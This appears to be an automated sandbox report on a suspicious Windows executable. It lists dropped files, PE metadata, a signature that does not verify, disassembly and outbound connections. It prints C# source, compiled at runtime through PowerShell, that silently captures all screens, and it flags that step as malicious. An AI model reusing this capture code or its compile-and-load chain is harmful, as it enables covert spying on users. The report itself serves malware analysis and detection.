Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yqzrwtyo.xaz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdtdohol.vyo.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zzjnxyzp.khc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\vebzhwcp\CSCD4517BE1E6C4428293E27562A6116680.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.115369244344814
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryPak7YnqqbPN5Dlq5J:+RI+ycuZhNtakSbPNnqX
MD5:	C34471E04E28507CCCC36F547514A1E0
SHA1:	4EA2B55EA28D23724884709A635E49E9B646688C
SHA-256:	8F8D64B38EC517DD13203A9AEAC6D6B2864DADD9565C0CE5FE0D4E7DC53267AA
SHA-512:	F2B8807F0DF62B3D6E3918C4BF75DF4B318E20A230874DC24C5569D9CB8F6E27CA11185CB02BCFC82604128EA0D1F876872332E83DF1726F2FD299D402BD24A8
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.e.b.z.h.w.c.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...v.e.b.z.h.w.c.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.154581034278981
Encrypted:	false
SSDEEP:	24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:	C76055A0388B713A1EABE16130684DC3
SHA1:	EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:	8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:	22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:	false
Reputation:	unknown
Preview:	.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
Category:	dropped
Size (bytes):	607
Entropy (8bit):	5.341776581640828
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5sZ23e:p37Lvkmb6KOkqe1xBkrk+ikGcGWZE6cb
MD5:	807E4C9FBB4024285F51DC1559114AFA
SHA1:	80BE7D6F9C685C04636FB9BD56645A975F0258EA
SHA-256:	FD0B4AE20370793F9A1293F457BB0426E360F6FD53E18199B90893B62C2D4052
SHA-512:	4D6DFC6B490A08E610DBF56002AAE630DDEBC6F9DA0E8F7491A2D60687709D309AFE7665A3F37DBCB0AAD2D6139065C5CC526BCE151D6613850E182F429CDDEA
Malicious:	true
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.0.cs"

C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.1617480018116106
Encrypted:	false
SSDEEP:	48:6tE7oEAtf0KhzBU/Hf6mtJsN00pW1ulta3Rq:YDNz0im0OSfK
MD5:	0D9DC2C4438071D3DE2CD489C0342F56
SHA1:	BA50E0F379193C5DBEF4898A5CF44BC8604FB6F9
SHA-256:	A265BBF62B81EA8A1394BA75792D788310E38203939973A25832F0AC212F38F4
SHA-512:	2DA10AF0749E5153EC9C3D56C889D526FC4F2325101DF1C44C40A3F92E1029513B792CFABC9FA391DDA10A21EB206F108407B471408C78B05D4704DC9C724FC2
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....[g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k.......(....B.(j........9.Q...........{.........(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
Category:	modified
Size (bytes):	1149
Entropy (8bit):	5.487345154519278
Encrypted:	false
SSDEEP:	24:K1cnmId3ka6KOkqeFkGcXE6caKax5DqBVKVrdFAMBJTH:hnmkka6NkqeFkNXEhaK2DcVKdBJj
MD5:	8C578ED822DCD7199F54FF0B57B64FDD
SHA1:	EEA727E044FFF2983B3271CD3168F6A05F350F96
SHA-256:	866E6F930BAC190A09B9F456211B0CA29733A74A2049D24CA816770E9C0C89D3
SHA-512:	C346A5FA4F4D88D26CDB597EC51A6EB9A6AA86CF0DF0F0CD88914005E4B3BC91DD96358BFE951D2B1809FA021721FC0BD039CBA5D0CD11E29AE57ABCDCCFC9CE
Malicious:	false
Reputation:	unknown
Preview:	.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longe

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	2464
Entropy (8bit):	3.2466774130035625
Encrypted:	false
SSDEEP:	24:QOaqdmuF3rc/Qh3+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIw:FaqdF7cYh3+AAHdKoqKFxcxkFOYht
MD5:	612A743078BDBF0F0430129C844E0777
SHA1:	70501C38B3B008359C2C06753D4DA589FF20F0F5
SHA-256:	B869C8CCB0B0639A268FE96FD5172DD5334834D50EF7ED812BCBDE560C62FE6C
SHA-512:	885E81A082A79D515D5444912E28326B1D44EB426761A62A9AC380B5D3A06D697C524C2501542CD1DD22AB912B68A5CBFBA50E0FA00AFA7236E47BF833BF9007
Malicious:	false
Reputation:	unknown
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 1.3. .. 2.0.2.4. .0.2.:.3.8.:.5.3.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e........................................ .W.S.C. .S.t.a.t.e. .I.n.f.o. ................................................................. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. ..............................d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.

\Device\ConDrv

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.331807756485642
Encrypted:	false
SSDEEP:	3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
MD5:	195D02DA13D597A52F848A9B28D871F6
SHA1:	D048766A802C61655B9689E953103236EACCB1C7
SHA-256:	ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
SHA-512:	1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
Malicious:	false
Reputation:	unknown
Preview:	..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.993046489499868
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	sppawx.exe
File size:	7'834'524 bytes
MD5:	546606959cb5b178d679b203d938cf88
SHA1:	f907e7d19734bf7459388b3299822858f0039711
SHA256:	5184b92097feeecf09d4e92b58c252333d397b3b7c424b62e73ae2fc2f6be405
SHA512:	be3efba75f20cffbad2b5209e308e95aca31861b8dff5461ce386f10d8276caf73a827bcf415120c07feff815f7099aa29f2b55b22b01301def62d75f478439c
SSDEEP:	196608:JNLjv+bhqNVoBLD7fEXEoYbiIv9pvvk9fIiZ1jk:TL+9qz8LD7fEUbiIqQgpk
TLSH:	9086335862A80CF1EE76403DD7A6DC8BDB76B8026710C9CF17A563266E27CC5843BB71
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..

File Icon


Icon Hash:	212303032313271a

Static PE Info

General

Entrypoint:	0x14000ce20
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x675566A3 [Sun Dec 8 09:28:03 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	72c4e339b7af8ab1ed2eb3821c98713a

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	28/09/2021 20:00:00 28/09/2024 19:59:59
Subject Chain	CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
Version:	3
Thumbprint MD5:	5C82B2D08EFE6EE0794B52D4309C5F37
Thumbprint SHA-1:	3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
Thumbprint SHA-256:	60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
Serial:	00BFB15001BBF592D4962A7797EA736FA3

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F667C82DA4Ch
dec eax
add esp, 28h
jmp 00007F667C82D66Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F667C82DE18h
test eax, eax
je 00007F667C82D813h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F667C82D7F7h
dec eax
cmp ecx, eax
je 00007F667C82D806h
xor eax, eax
dec eax
cmpxchg dword ptr [0003570Ch], ecx
jne 00007F667C82D7E0h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F667C82D7E9h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007F667C82D7F9h
mov byte ptr [000356F5h], 00000001h
call 00007F667C82CF45h
call 00007F667C82E230h
test al, al
jne 00007F667C82D7F6h
xor al, al
jmp 00007F667C82D806h
call 00007F667C83AD4Fh
test al, al
jne 00007F667C82D7FBh
xor ecx, ecx
call 00007F667C82E240h
jmp 00007F667C82D7DCh
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [000356BCh], 00000000h
mov ebx, ecx
jne 00007F667C82D859h
cmp ecx, 01h
jnbe 00007F667C82D85Ch
call 00007F667C82DD8Eh
test eax, eax
je 00007F667C82D81Ah
test ebx, ebx
jne 00007F667C82D816h
dec eax
lea ecx, dword ptr [000356A6h]
call 00007F667C83AB42h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3ca34	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x47000	0x32c0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x44000	0x2238	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x776754	0x2448
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4b000	0x764	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a080	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x39f40	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x4a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29f70	0x2a000	b8c3814c5fb0b18492ad4ec2ffe0830a	False	0.5518740699404762	data	6.489205819736506	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0x12a28	0x12c00	dcb588e4dcd50b957dfec9051054ec3f	False	0.5243229166666666	data	5.750765495162648	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x53f8	0xe00	dba0caeecab624a0ccc0d577241601d1	False	0.134765625	data	1.8392217063172436	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x44000	0x2238	0x2400	9cd1eac931545f28ab09329f8bfce843	False	0.4697265625	data	5.2645170849678795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x47000	0x32c0	0x3400	dfc07f3b2591bb154fb9567147b84012	False	0.8291015625	data	7.464053157469813	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4b000	0x764	0x800	816c68eeb419ee2c08656c31c06a0fff	False	0.5576171875	data	5.2809528666624175	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x47250	0x1c1	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	1.024498886414254
RT_ICON	0x47414	0x20c	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced	1.0209923664122138
RT_ICON	0x47620	0x273	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced	1.0175438596491229
RT_ICON	0x47894	0x434	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced	1.0102230483271375
RT_ICON	0x47cc8	0x53e	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	1.0081967213114753
RT_ICON	0x48208	0x9b9	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	1.004419445560466
RT_ICON	0x48bc4	0xdc3	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.930456996877661
RT_GROUP_ICON	0x49988	0x68	data	0.7403846153846154
RT_VERSION	0x499f0	0x3c0	data	0.45416666666666666
RT_MANIFEST	0x49db0	0x50d	XML 1.0 document, ASCII text	0.4694508894044857

Imports

DLL	Import
USER32.dll	CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 08:38:02.365442991 CET	49716	80	192.168.2.11	208.95.112.1
Dec 13, 2024 08:38:02.485296965 CET	80	49716	208.95.112.1	192.168.2.11
Dec 13, 2024 08:38:02.488701105 CET	49716	80	192.168.2.11	208.95.112.1
Dec 13, 2024 08:38:02.489600897 CET	49716	80	192.168.2.11	208.95.112.1
Dec 13, 2024 08:38:02.609486103 CET	80	49716	208.95.112.1	192.168.2.11
Dec 13, 2024 08:38:03.619998932 CET	80	49716	208.95.112.1	192.168.2.11
Dec 13, 2024 08:38:03.621012926 CET	49716	80	192.168.2.11	208.95.112.1
Dec 13, 2024 08:38:03.859503031 CET	80	49716	208.95.112.1	192.168.2.11
Dec 13, 2024 08:38:03.861222982 CET	49716	80	192.168.2.11	208.95.112.1
Dec 13, 2024 08:38:35.941164970 CET	49795	80	192.168.2.11	208.95.112.1
Dec 13, 2024 08:38:36.061794996 CET	80	49795	208.95.112.1	192.168.2.11
Dec 13, 2024 08:38:36.061943054 CET	49795	80	192.168.2.11	208.95.112.1
Dec 13, 2024 08:38:36.062210083 CET	49795	80	192.168.2.11	208.95.112.1
Dec 13, 2024 08:38:36.182543039 CET	80	49795	208.95.112.1	192.168.2.11
Dec 13, 2024 08:38:37.177577019 CET	80	49795	208.95.112.1	192.168.2.11
Dec 13, 2024 08:38:37.221718073 CET	49795	80	192.168.2.11	208.95.112.1
Dec 13, 2024 08:38:37.642853022 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:37.642889977 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:37.642960072 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:37.670317888 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:37.670346022 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.883930922 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.884449959 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.884466887 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.885473967 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.885535955 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.887022018 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.887080908 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.887399912 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.887404919 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.887490988 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.887507915 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.887623072 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.887658119 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.887852907 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.887875080 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.888041019 CET	49799	443	192.168.2.11	162.159.135.232
Dec 13, 2024 08:38:38.888056993 CET	443	49799	162.159.135.232	192.168.2.11
Dec 13, 2024 08:38:38.888242006 CET	49799	443	192.168.2.11	162.159.135.232
